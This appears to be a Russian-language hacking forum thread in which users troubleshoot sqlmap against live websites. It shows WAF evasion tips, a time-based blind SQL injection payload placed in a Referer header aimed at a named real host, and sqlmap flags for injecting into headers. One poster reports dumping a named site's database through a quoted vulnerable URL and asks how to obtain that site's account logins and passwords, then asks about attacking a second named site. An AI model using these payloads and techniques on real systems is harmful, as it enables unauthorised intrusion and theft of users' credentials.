надо узнать почему не может, доступ к information_schema есть? дебаг запросов юзал?

дебаг пишет [DEBUG] got HTTP error code: 441 (SQL Injection Detected) почти на все.

пропускает запросы типа 1 RLIKE (SELECT (CASE WHEN (9434=9434) THEN 1 ELSE 0x28 END))

возвращает ноль при запросе к счема.таблес

да похоже на waf, "441 (SQL Injection Detected) почти на все" почти на всё, но получается не на всё, возможно слово from его смущает, попробуй запрос отправить что то типа "select 1 from 1"

к information_schema вероятно поэтому же доступа нет

Подскажите пожалуйста как узать команду --os-bof?

Я все делаю с телефона. Скачал себе metasploit framework через терминал GNURoot Debian как требовал sqlmap, но при выполнении запроса с командой --os-bof он все-равно требует наличие метасплоита. Как решить эту проблему? Или может надо сплоит закинуть в папку какую то?

И еще вопрос можно ли как то получить логины и пароли к ЛК на этом сайте samp-gf.ru?

Сдампил БД через эту узвимость http://samp-gf.ru/download.php?id=3' , но ничего толкового не нашел в таблицах.

И вот на этом сайте samp-rp.ru можно что нибудь сделать, я вроде ничего похожего на соль не нашел.

привет

как вот такое крутить в sqlmap

Request

GET /authenticate.php HTTP/1.1

Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(no w()=sysdate(),sleep(0),0))OR"*/

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

X-Requested-With: XMLHttpRequest

Host: wwwl.accuweather.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*

HTTP/1.1 302 Found

Date: Wed, 23 Nov 2016 12:55:50 GMT

Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.1e-fips PHP/5.4.16

X-Powered-By: PHP/5.4.16

Location: error.php?url=&mt=

Content-Length: 43

Keep-Alive: timeout=5, max=64

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

cкулмап -у site/authenticate.php --хедер'реферер*'

.SpoilerTarget" type="button">Spoiler: Список_параметров_для_фазз� �нга
--level=2 // фазит Cookie header

--level=3 // фазит User-Agent header, и Refererзаголовки

--level=5 // фазит Host header
Ну а в твоем случае,так как написали Выше

Используй астерикс (*)

--user-agent="sqlmap*" // тест иньекции в user-agent

--referer="target.com*" //тест иньекци в referer

--headers="User-Agent:test*\nReferer:bla" // Тоже самое что и --referer="blas" --user-agent="pipiska*"

--headers="MegaHeader= BigPipiska*" // Поиск скули в заголовке MegaHeader

Или же просто поставь астерикс(*) в нужном месте для иньекции в твоем request.txt

-r request.txt

Подскажите почему так происходит и как это можно обойти.

Начал раскручивать /page.aspx?id=1

Вот так выглядел запрос:

Ответ "connection timed out", даже если добавить --hpp



Затем попробовал добавить tamper:

В итоге "500 internal server error":

.SpoilerTarget" type="button">Spoiler: Image with --tamper


Затем, после десяток попыток и экспериментов с разными запросами, оно всё же получило свой payload и отобразило --current-db. При чем без прописывания --tamper или --hpp. Вот что показал --banner.

.SpoilerTarget" type="button">Spoiler: Image --banner


Но вся проблема теперь состоит в том, что не хочет отображать таблицы.

.SpoilerTarget" type="button">Spoiler: Image --tables

Количество таблиц определяет, но имена не хочет. Вот как реагирует если добавить --hpp --parse-errors:

.SpoilerTarget" type="button">Spoiler: Image --hpp --parse-errors

Та же проблема если использовать --common-tables:

.SpoilerTarget" type="button">Spoiler: Image --common-tables


Как такое можно обойти?

если оно само заработало, может на сервере ограничение запросов в минуту например?

попробуй --delay=2 выставить, ну попытка не пытка